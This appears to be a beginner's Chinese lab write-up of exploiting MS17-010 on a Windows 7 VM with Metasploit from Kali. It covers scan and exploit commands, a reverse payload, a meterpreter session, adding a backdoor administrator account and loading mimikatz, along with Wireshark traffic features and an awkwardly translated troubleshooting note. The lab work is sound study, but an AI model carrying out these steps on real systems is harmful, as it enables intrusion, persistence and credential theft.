安全小白 整理分享学习过程 欢迎指点 呜呜呜卑微仔、、、
一、实验环境:
1、攻击机:Kali IP:192.168.218.157
1)攻击工具:msf
2)分析工具:wireshark
2、靶 机:Windows7(旗舰版) IP:192.168.218.160
1)开启网络共享(SMB协议)
2)关闭防火墙
3、网卡连接方式:Vmnet8(NAT)
二、实验步骤:
1、测试攻击机与靶机的连通性
2.进行MS17-010漏洞扫描
1)启动msf
命令:msfconsole
2)搜索ms17_010
命令:search ms17_010
3)smb_ms17_010模块进行MS17-010漏洞扫描
4)设置攻击载荷
payload模块进行反弹连接
5)查看需要设置的模块(带yes的)
6)设定监听主机 set lhost 192.168.218.157(kali)
设置扫描的主机(网段)以及端口号 SMB协议默认445端口
命令:set rhosts 192.168.218.160/24
7)执行exploit(run)命令进行扫描 发现目标主机漏洞
可以看到监听IP及端口,攻击机与靶机之间成功建立会话
出现meterpreter>攻击成功!渗透后信息收集、持续攻击
Meterpreter>sysinfo
2)查看用户身份
Meterpreter>getuid
3)获得shell控制并新建一个用户
4)将此用户加入本地管理员组(后门植入,获取更大的权限)
选择vmnet 8网卡
攻击过程重要数据特征
1.NT空载指令
2.TRANS 2 攻击负载 拆分
3.Response =>Multiplex ID:64(攻击成功)
过程中所遇到的问题:
Exploit completed, but no session was created.(攻击成功但会话未连接)
如果出现以下情况之一,则“无会话已创建”消息
发生:
1)使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,有一个问题
利用代码,或目标配置有问题。(经检查验证是此问题)
2)使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。在这种情况下,框架无法知道
被剥削者是否工作,因为它没有收到连接
从目标成功时(例如运行记事本)。
如果尝试反向有效载荷,获取该消息和目标服务
不会崩溃,确保您的目标设置是正确的,而且
目标系统正在运行正确版本的易受攻击的软件。
参考链接:
https://blog.csdn.net/qq_36374896/article/details/107005461?utm_source=app&app_version=4.8.1
2. 加载mimikatz模块----load mimikatz